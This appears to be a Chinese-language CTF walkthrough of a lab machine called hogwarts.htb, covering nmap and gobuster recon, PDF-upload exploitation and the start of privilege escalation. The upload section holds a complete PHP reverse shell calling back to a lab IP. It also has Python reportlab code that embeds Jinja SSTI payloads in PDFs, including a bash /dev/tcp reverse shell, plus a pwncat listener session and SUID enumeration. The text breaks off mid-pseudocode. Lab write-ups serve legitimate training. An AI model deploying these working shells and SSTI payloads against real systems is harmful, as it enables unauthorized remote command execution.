| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCihzhvruzjUnXRfyh685PiUN5ItFZ/V0IHymFDih4nSIcKYrhMIw06oKdfeT3zo4tP14xB3ZrjnI3sEFh9R8LV34dTNhH4cNUtbS/f0h2inMM35dJc533bNxJtT/znohcEjYgUP3PSCK3dOuP+CcMrW8z+0QJJE9gbw9DqC5hlCzZwBHJgMvNhP74hBD/JayHiS8G+K2G4owfXRHBs3LhEXYpHEibAHS/E1G1j9R2wzTLKoN5Y0JKQ+bLxGbJekcnSl2o6hlAarOQnX1I3G+EFgWexJn/xABxqEWk9B6NLhhPozoTyi43Xc/omUF6Cw9jFl2v4z7bABMVVPjlXH748C6tFeRzx6/mqAv2Ok2+Hzf1iessMzvYs1hnZBqL51gwcmBmMoSovm68d2jEKUwVQxEIsFH5lFGQciyM0rfn6EcA0up6iomAhs2fTA8MsOG6WJWd1Sw2nCTNygrmQ8tZfVGYz8rVaH8MkUENct8IxGN1iqel+9Cmdka9DDb+BMVM=
|   256 9c:c3:1d:ea:22:04:93:b7:81:dd:f2:96:5d:f0:1f:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAZBwooUDLqSK+kKOx+YVnScFejnY3t0q+D4qt3jCOsjP4dJ8Wf9ORNUbHa7CtlrK3WlqluzuRQsXJ10tvyTw8=
|   256 55:41:15:90:ff:1d:53:88:e7:65:91:4f:fd:cf:49:85 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGM6WqG9CguoVafo9uhRSPqtZG9yR57PD70/FKDqba9e
53/tcp closed domain  reset ttl 64
80/tcp open   http    syn-ack ttl 64 Werkzeug/3.0.4 Python/3.8.10
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://hogwarts.htb
|_http-server-header: Werkzeug/3.0.4 Python/3.8.10
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/3.0.4 Python/3.8.10
|     Date: Sat, 24 Jan 2026 14:30:23 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 225
|     Location: http://hogwarts.htb
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://hogwarts.htb">http://hogwarts.htb</a>. If not, click the link.
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=1/24%Time=6974D778%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1B1,"HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/3\.0\.4
SF:\x20Python/3\.8\.10\r\nDate:\x20Sat,\x2024\x20Jan\x202026\x2014:30:23\x
SF:20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length
SF::\x20225\r\nLocation:\x20http://hogwarts\.htb\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<title>Redirecting\.\.\.</
SF:title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x20be\x20redirecte
SF:d\x20automatically\x20to\x20the\x20target\x20URL:\x20<a\x20href=\"http:
SF://hogwarts\.htb\">http://hogwarts\.htb</a>\.\x20If\x20not,\x20click\x20
SF:the\x20link\.\n")%r(HTTPOptions,1B1,"HTTP/1\.1\x20302\x20FOUND\r\nServe
SF:r:\x20Werkzeug/3\.0\.4\x20Python/3\.8\.10\r\nDate:\x20Sat,\x2024\x20Jan
SF:\x202026\x2014:30:23\x20GMT\r\nContent-Type:\x20text/html;\x20charset=u
SF:tf-8\r\nContent-Length:\x20225\r\nLocation:\x20http://hogwarts\.htb\r\n
SF:Connection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<tit
SF:le>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20sho
SF:uld\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20URL:
SF:\x20<a\x20href=\"http://hogwarts\.htb\">http://hogwarts\.htb</a>\.\x20I
SF:f\x20not,\x20click\x20the\x20link\.\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x2
SF:0HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>
SF:\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http
SF:-equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x2
SF:0\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20
SF:code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x2
SF:0request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-
SF:\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20
SF:\x20\x20\x20</body>\n</html>\n");
MAC Address: 08:00:27:D2:BA:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=53%CU=34755%PV=Y%DS=1%DC=D%G=Y%M=0800
OS:27%TM=6974D7CA%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)

Uptime guess: 40.160 days (since Mon Dec 15 05:40:37 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms tmpfile.dsz (192.168.0.106)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.07 seconds
           Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.406KB)

/etc/hosts

echo "192.168.0.106 hogwarts.htb" >> /etc/hosts

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u hogwarts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.106
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,db,bak,js,yaml,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.0.106/e304c45d-9ed9-4981-b561-cf8b58e733b0 => 302 (Length: 225). To continue please exclude the status code or the length

http://hogwarts.htb

欢迎来到霍格沃茨魔法学校
霍格沃茨魔法学校是世界上最负盛名的魔法学府之一，创建于一千多年前，由当时最伟大的四位巫师和女巫共同创立：戈德里克·格兰芬多、赫尔加·赫奇帕奇、罗伊娜·拉文克劳以及萨拉查·斯莱特林。学校坐落于苏格兰高地，这里不仅是一所学校，更是年轻巫师们学习、成长并掌控自身魔法能力的圣地。在强大魔法的保护下，霍格沃茨对麻瓜世界隐匿无踪，如同一座象征着魔法知识与冒险的灯塔。

在霍格沃茨，新生会被分入四大学院之一：
格兰芬多：以勇气与胆识著称
赫奇帕奇：代表忠诚与勤奋
拉文克劳：象征智慧与创造力
斯莱特林：崇尚野心与谋略

分院帽是一件被四位创始人赋予智慧的魔法物品，它会根据学生的性格与潜力决定最适合他们的学院。

认识我们的部分教授
阿不思·邓布利多教授 —— 校长
邓布利多不仅是霍格沃茨的校长，也是魔法史上最强大、最受尊敬的巫师之一。他以智慧、仁慈以及对魔法界与麻瓜世界的坚定守护而闻名。1945 年击败黑巫师格林德沃的壮举，以及对魔法研究的巨大贡献（包括发现龙血的十二种用途），使他名留青史。

米勒娃·麦格教授 —— 变形术
作为副校长兼格兰芬多学院院长，麦格教授治学严谨、公正严肃，深受学生敬重。她教授变形术——魔法中最困难的分支之一，内容包括改变物体或生物的形态。在她的指导下，学生们学会将动物变成物品，把茶杯变成老鼠，最终掌握人体变形术。

莱姆斯·卢平教授 —— 黑魔法防御术
卢平教授是霍格沃茨历史上最受欢迎的教师之一。他以富有同情心且高超的教学方式教授黑魔法防御术，学生们在课堂上学习如何对抗博格特、摄魂怪、狼人等黑暗生物，以及抵御黑魔法与诅咒。这门课程至关重要，为学生面对魔法世界中的黑暗势力做好准备。

西弗勒斯·斯内普教授 —— 魔药学
斯内普教授是斯莱特林学院院长，也是霍格沃茨最复杂、最神秘的人物之一。他在魔药学方面造诣极高，学生们在他的课堂上学习从基础解药到危险而复杂的魔药调制。

你将在霍格沃茨学到的课程
变形术：改变物体或生命形态的艺术
魔咒学：为物体或生物赋予特殊属性的咒语
魔药学：研究具有多种效果的魔法药剂
草药学：研究魔法植物与菌类
黑魔法防御术：防御黑暗生物、诅咒与黑魔法
天文学：研究星辰、行星及其魔法影响
魔法史：回顾魔法世界从远古到现代的历史
占卜学：预测未来的神秘艺术
神奇生物保护课：学习照料、驯养和喂养魔法生物

申请加入霍格沃茨
请以 PDF 格式提交你的申请材料。
👉 请使用我们提供的模板。

<form action="/upload" method="POST" enctype="multipart/form-data">
    <input type="file" name="pdf_file" required>
    <input type="submit" value="Submit">
</form>

POST /upload HTTP/1.1

Host: hogwarts.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------9505286192044214114097786600

Content-Length: 9517

Origin: http://hogwarts.htb

Connection: keep-alive

Referer: http://hogwarts.htb/

Upgrade-Insecure-Requests: 1

Priority: u=0, i



-----------------------------9505286192044214114097786600

Content-Disposition: form-data; name="pdf_file"; filename="shell.php"

Content-Type: application/x-php



<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = 'bash';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $fstat = fstat($input);
        $size = $fstat['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();

            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS

                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }

                    // ----- WORK BEGIN -----
                    $status = proc_get_status($process);
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
                    do {
						$status = proc_get_status($process);
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
                        }                                                                    // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------

                fclose($socket);
            }
            // ------ SOCKET END ------

        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('192.168.0.108', 4444);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>


-----------------------------9505286192044214114097786600--

HTTP/1.1 500 INTERNAL SERVER ERROR

Server: Werkzeug/3.0.4 Python/3.8.10

Date: Sat, 24 Jan 2026 14:50:12 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 265

Connection: close



<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

/upload

构造

POST /upload HTTP/1.1

Host: hogwarts.htb

User-Agent: Mozilla/5.0

Accept: */*

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123

Content-Length: 286



------WebKitFormBoundaryABC123

Content-Disposition: form-data; name="pdf_file"; filename="test.pdf"

Content-Type: application/pdf



%PDF-1.4

1 0 obj

<< /Type /Catalog >>

endobj

xref

0 1

0000000000 65535 f

trailer

<< /Root 1 0 R >>

%%EOF



------WebKitFormBoundaryABC123--

HTTP/1.1 200 OK

Server: Werkzeug/3.0.4 Python/3.8.10

Date: Sat, 24 Jan 2026 14:52:12 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 1644

Connection: close




        <!DOCTYPE html>
        <html lang="en">
            <head>
                <meta charset="UTF-8">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <title>Confirmation</title>
                <link rel="stylesheet" href="/static/style.css">

                <link rel="apple-touch-icon" sizes="180x180" href="/static/favicon/apple-touch-icon.png">
                <link rel="icon" type="image/png" sizes="32x32" href="/static/favicon/favicon-32x32.png">
                <link rel="icon" type="image/png" sizes="16x16" href="/static/favicon/favicon-16x16.png">
                <link rel="manifest" href="/static/favicon/site.webmanifest">
                <link rel="mask-icon" href="/static/favicon/safari-pinned-tab.svg" color="#5bbad5">
                <meta name="msapplication-TileColor" content="#da532c">
                <meta name="theme-color" content="#ffffff">
            </head>
            <body>
                <div class="content">
                    <h1>Application Received</h1>
                    <p>Thank you. Your application to Hogwarts has been successfully submitted with the following data:</p>
                    <p>
                        <ul>
                            <li>Name: </li>
                            <li>Surname: </li>
                            <li>Address: </li>
                            <li>Birthday: </li>
                            <li>Pet Breed: </li>
                            <li>Pet's Name: </li>
                        </ul>
                    </p>
                </div>
            </body>
        </html>

解析

1️⃣ `/upload`只接受 PDF

.docx 模板直接上传 ❌
最小合法 PDF 上传 ✅（200 OK）

2️⃣ 返回页面里的字段

<li>Name: </li>
<li>Surname: </li>
<li>Address: </li>
<li>Birthday: </li>
<li>Pet Breed: </li>
<li>Pet's Name: </li>

但你在请求里 只传了一个文件，没有任何字段。

👉 结论非常明确：

后端是 从 PDF 文件内部解析字段内容，然后渲染到模板里。

这一步已经不是“上传”，而是 PDF → 结构化数据解析。

🧠 后端大概率在做什么（Flask 视角）

结合：

Flask / Werkzeug
PDF
字段名固定

非常典型的逻辑👇

from PyPDF2 import PdfReader

reader = PdfReader(uploaded_file)
text = reader.pages[0].extract_text()

name = extract("Name:", text)
surname = extract("Surname:", text)
...
return render_template("confirmation.html", **fields)

或者更高级一点：

使用 PDF 表单字段（AcroForm）
用 get_fields() 之类的 API

👉 这意味着攻击面不在“上传”，而在：

PDF 内容结构
PDF 字段 / 文本解析
模板渲染

漏洞利用

发现可能是Python解析的，尝试SSTI：

from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter

c = canvas.Canvas("malicious.pdf", pagesize=letter)
c.drawString(100, 700, "Name: Harry")
c.drawString(100, 680, "Surname: {{7*7}}")
c.drawString(100, 660, "Address: PrivetDrive")
c.drawString(100, 640, "Birthday: 31071980")
c.drawString(100, 620, "Pet Breed: Owl")
c.drawString(100, 600, "Pet's Name: Hedwig")
c.save()

可以执行命令，尝试反弹shell

from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter

c = canvas.Canvas("malicious.pdf", pagesize=letter)
c.drawString(100, 700, "Name: Harry")
c.drawString(100, 680, "Surname: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c \"bash -i >& /dev/tcp/192.168.0.108/4444 0>&1\"').read() }}")
c.drawString(100, 660, "Address: PrivetDrive")
c.drawString(100, 640, "Birthday: 31071980")
c.drawString(100, 620, "Pet Breed: Owl")
c.drawString(100, 600, "Pet's Name: Hedwig")
c.save()

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 4444
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import iter_entry_points
[10:45:04] Welcome to pwncat 🐈!         __main__.py:164
[10:45:11] received connection from           bind.py:84
           192.168.0.106:50872                          
[10:45:13] 192.168.0.106:50872:           manager.py:957
           registered new host w/ db                    
(local) pwncat$ back
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$

提权

(remote) harry_potter@MagiFi:/home/harry_potter$ cat user.txt 
hogwarts{ea4bc74f09fb69771165e57b1b215de9}

(remote) harry_potter@MagiFi:/$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/xxd_horcrux
/usr/bin/su
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/authbind/helper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/snapd/23545/usr/lib/snapd/snap-confine
/snap/core20/2434/usr/bin/chfn
/snap/core20/2434/usr/bin/chsh
/snap/core20/2434/usr/bin/gpasswd
/snap/core20/2434/usr/bin/mount
/snap/core20/2434/usr/bin/newgrp
/snap/core20/2434/usr/bin/passwd
/snap/core20/2434/usr/bin/su
/snap/core20/2434/usr/bin/sudo
/snap/core20/2434/usr/bin/umount
/snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2434/usr/lib/openssh/ssh-keysign
/snap/core20/2686/usr/bin/chfn
/snap/core20/2686/usr/bin/chsh
/snap/core20/2686/usr/bin/gpasswd
/snap/core20/2686/usr/bin/mount
/snap/core20/2686/usr/bin/newgrp
/snap/core20/2686/usr/bin/passwd
/snap/core20/2686/usr/bin/su
/snap/core20/2686/usr/bin/sudo
/snap/core20/2686/usr/bin/umount
/snap/core20/2686/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2686/usr/lib/openssh/ssh-keysign
/home/tom.riddle/.horcrux.png

(remote) harry_potter@MagiFi:/home/tom.riddle$ strings /usr/bin/xxd_horcrux
/lib64/ld-linux-x86-64.so.2
w9-$9
libc.so.6
exit
strncmp
wait
perror
getpwuid
puts
fork
__stack_chk_fail
dup2
stderr
getuid
execvp
fwrite
close
open
__cxa_finalize
strcmp
__libc_start_main
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/usr/bin/xxd
--help
    -O <file>   specify output file (only horcruxes are allowed).
Error forking
tom.riddle
You are not worthy to handle the Horcrux!
/root/
/etc/
I hate dealing with Muggle gadgets!
Error: Output file can't be empty, use the -O option.
.horcrux.png
Not every wizards can use or destroy a Horcrux!
Error opening output file
Error redirecting output to file
Error executing xxd
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
xxd_horcrux.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strncmp@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
getpwuid@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
getuid@@GLIBC_2.2.5
dup2@@GLIBC_2.2.5
close@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
show_help
__libc_csu_init
__bss_start
main
open@@GLIBC_2.2.5
perror@@GLIBC_2.2.5
execvp@@GLIBC_2.2.5
exit@@GLIBC_2.2.5
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
wait@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
fork@@GLIBC_2.2.5
stderr@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
(remote) harry_potter@MagiFi:/home/tom.riddle$ /usr/bin/xxd_horcrux 
You are not worthy to handle the Horcrux!
“你不配掌控（或处理）这个魂器！”

XXD

xxd 是一个把二进制数据“翻译成人能看懂的十六进制文本”的工具，本质上就是个 hex dump / hex editor 辅助工具。

一句话版👇

xxd = 把文件的每个字节，用十六进制方式展示出来（也能反过来）

xxd_horcrux

逆向ai复原伪代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/wait.h>
#include <fcntl.h>

void show_help() {
    pid_t pid = fork();
    if (pid == 0) {
        // 子进程直接执行 xxd --help
        char *argv[] = {"/usr/bin/xxd", "--help", NULL};
        execvp("/usr/bin/xxd", argv);
        _exit(1); // exec失败
    } else if (pid > 0) {
        // 父进程等待子进程
        wait(NULL);
